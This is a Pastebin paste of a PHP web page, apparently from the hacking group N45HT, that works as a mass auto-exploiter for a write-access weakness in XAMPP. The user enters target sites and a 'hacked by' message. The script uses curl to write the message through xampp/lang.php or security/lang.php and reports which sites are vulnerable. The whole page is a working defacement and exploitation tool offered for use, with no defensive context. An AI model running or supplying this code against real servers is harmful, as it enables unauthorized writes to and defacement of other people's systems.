Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!--
- coded by ShinChan - N45HT | 15/12/2017
- updated at 20/11/2018 22:51 (Asia/Jakarta)
- # ShinChan - N45HT - N45HT.WEB.ID
- # fb.com/angelia.put - fb.com/ShinChan.admin - fb.com/N45HTOfficial - fb.com/groups/N45HTOfficial
- # shinchan0x1945@gmail.com
- note : jangan hapus copyright, hargai pembuat
- -->
- <!doctype html>
- <html>
- <head>
- <title>XAMPP Local Write Access Auto Xploiter - Web Based</title>
- <meta name='description' content='XAMPP Local Write Access Auto Exploit!!!' />
- <meta name='author' content='N45HT' />
- <style type='text/css'>
- body {
- margin:20 auto;
- background:white;
- color:black;
- font-family:verdana;
- text-align:center;
- text-shadow: 0 .05rem .1rem rgba(0,0,0,.5);
- }
- input[type=submit] {
- border: 1px solid rgb(100,100,100);
- color: black;
- background: transparent;
- width: 500px;
- height:35px;
- font-family:verdana;
- border-radius:5px;
- }
- input[type=submit]:hover{
- background-color:gray;
- color:white;
- }
- input[type=text] {
- border: 1px solid rgb(100,100,100);
- color: #000;
- height:35px;
- width:500px;
- font-family:verdana;
- border-radius:5px;
- }
- textarea {
- background: transparent;
- color: #000;
- border: 1px solid rgb(100,100,100);
- resize: none;
- width: 500px;
- height: 180px;
- padding-left: 5px;
- margin: 5px auto;
- font-family:verdana;
- border-radius:5px;
- }
- a{
- text-decoration:none;
- }
- </style>
- </head>
- <body>
- <font size='6'>XAMPP Local Write Access Auto Xploiter</font>
- <br><br>
- <font size='2'>coded by : ShinChan - N45HT</font>
- <br>
- <font size='2'>thanks to : PETR03X - Comod0x - SCYTHE404_LOL - Grav3 - FRU_403</font>
- <br><br><br>
- <form method='POST' action=''>
- Target :<br>
- <textarea name='target' placeholder='target.com or target.com/[path]' required></textarea><br><br>
- kata kata terakhir :<br>
- <input type='text' name='msg' placeholder='hacked by Indonesian h4x0r'/>
- <br><br>
- <input type='submit' value='Exploit!!!' />
- </form>
- <?php
- error_reporting(0);
- if($_POST){
- $target = $_POST['target'];
- $msg = htmlspecialchars(str_replace(" ","_",$_POST['msg']));
- $msg1 = str_replace("<","_",$msg);
- $msg2 = str_replace(">","_",$msg1);
- $msg3 = str_replace(">","_",$msg2);
- $pwn = str_replace("<","_",$msg3);
- if($pwn == ""){
- $pwn = "hacked_by_N45HT";
- }
- $targets = explode("\r\n",$target);
- foreach($targets as $site){
- if(!preg_match("/^http:\/\//",$site) AND !preg_match("/^https:\/\//",$site)){
- $sites = "http://$site";
- }else{
- $sites = $site;
- }
- $showsites = htmlspecialchars($sites);
- $chx = curl_init("$sites/xampp/lang.tmp");
- curl_setopt($chx, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($chx, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($chx, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($chx, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0");
- curl_exec($chx);
- $httpcodex = curl_getinfo($chx, CURLINFO_HTTP_CODE);
- curl_close($chx);
- $chs = curl_init("$sites/security/lang.tmp");
- curl_setopt($chs, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($chs, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($chs, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($chs, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0");
- curl_exec($chs);
- $httpcodes = curl_getinfo($chs, CURLINFO_HTTP_CODE);
- curl_close($chs);
- if($httpcodex == 200){
- $ck = curl_init("$sites/xampp/lang.php?$pwn");
- curl_setopt($ck, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ck, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ck, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ck, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0");
- $cka = curl_exec($ck);
- if($cka){
- $ch = curl_init("$sites/xampp/lang.tmp");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0");
- $cek = curl_exec($ch);
- if(preg_match("/$pwn/",$cek)){
- echo "<a href='$sites/xampp/lang.tmp' target='_blank'>$showsites/xampp/lang.tmp</a> => OK<br>";
- }else{
- echo "$showsites => FAILED<br>";
- }
- curl_close($ch);
- }
- }else if($httpcodes == 200){
- $ck = curl_init("$sites/security/lang.php?$pwn");
- curl_setopt($ck, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ck, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ck, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ck, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0");
- $cka = curl_exec($ck);
- if($cka){
- $ch = curl_init("$sites/security/lang.tmp");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0");
- $cek = curl_exec($ch);
- if(preg_match("/$pwn/",$cek)){
- echo "<a href='$sites/security/lang.tmp' target='_blank'>$showsites/security/lang.tmp</a> => OK<br>";
- }else{
- echo "$showsites => FAILED<br>";
- }
- curl_close($ch);
- }
- }else{
- echo "$showsites => Not Vuln<br>";
- }
- }
- }
- ?>
- <p style='margin-top:50px;'>copyright@<a href='https://facebook.com/N45HTOfficial'>N45HT</a>.</p>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement